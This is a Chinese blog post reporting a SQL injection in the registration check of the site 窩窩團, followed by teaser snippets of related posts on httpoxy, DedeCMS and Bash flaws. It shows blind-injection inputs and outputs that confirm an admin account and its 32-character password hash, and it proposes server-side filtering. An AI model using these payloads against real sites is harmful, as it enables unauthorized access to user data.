窩窩團SQL 注入漏洞及修復方案

2022-09-23 22:45:17 字數 1466 閱讀 3392

註冊頁面 校驗email和使用者名稱的地方使用了ajax post 資料到伺服器端檢測,但是過濾僅在客戶端進行。使用指令碼或者瀏覽器工具可以輕鬆繞過。

以下為測試**(python):

從探測過程看,似乎後台對sql 做了一定的保護,或者是有其他邏輯影響。因此採用'adminccc' or (%s) or '4'='3' 三個或條件來測試。由於adminccc 使用者目前沒有註冊因此第乙個條件是不成立的,'4'='3' 也是不成立的。實際測試結果僅為括號內條件

漏洞證明:

執行指令碼:

d:\>post_test.py "username='admin'"

true

返回true 說明存在admin使用者

d:\>post_test.py "username='admin' and length(password)=31"

false

d:\>post_test.py "username='admin' and length(password)=32"

true

說明密碼長度是32位元組,估計是md5 不繼續做修改性測試:如通過sql修改密碼

ps: username password 字段純屬猜測得到,沒有通過查詢系統表

修復方案:

建議後台增加sql語句過濾。

作者:  matrix

httpoxy 漏洞預警及修復方案

php go python等開啟cgi client 模式的指令碼語言 language 環境依賴 在cgi rfc 3875 的模式的時候,server 會把請求中的 header,加上 http 字首,註冊為環境變數,且重名變數會被覆蓋汙染,若該變數被指令碼呼叫,即可利用,該漏洞在15年前在lw...

SQL 注入漏洞修復

一 include filter.inc.php檔案,搜尋 大概在46行的樣子 return svar 修改為return addslashes svar 二 member mtypes.php檔案,搜尋 大概在71行的樣子 query update dede mtypes set mtypenam...

Linux Bash嚴重漏洞緊急修復方案

今天剛剛爆出bash安全漏洞,bash存在乙個安全的漏洞,該漏洞直接影響基於unix的系統 如linux os x 等 該漏洞將導致遠端 者在受影響的系統上執行任意 已確認被成功利用的軟體及系統 所有安裝gnu bash 版本小於或者等於4.3的linux作業系統。漏洞描述 該漏洞源於你呼叫的bas...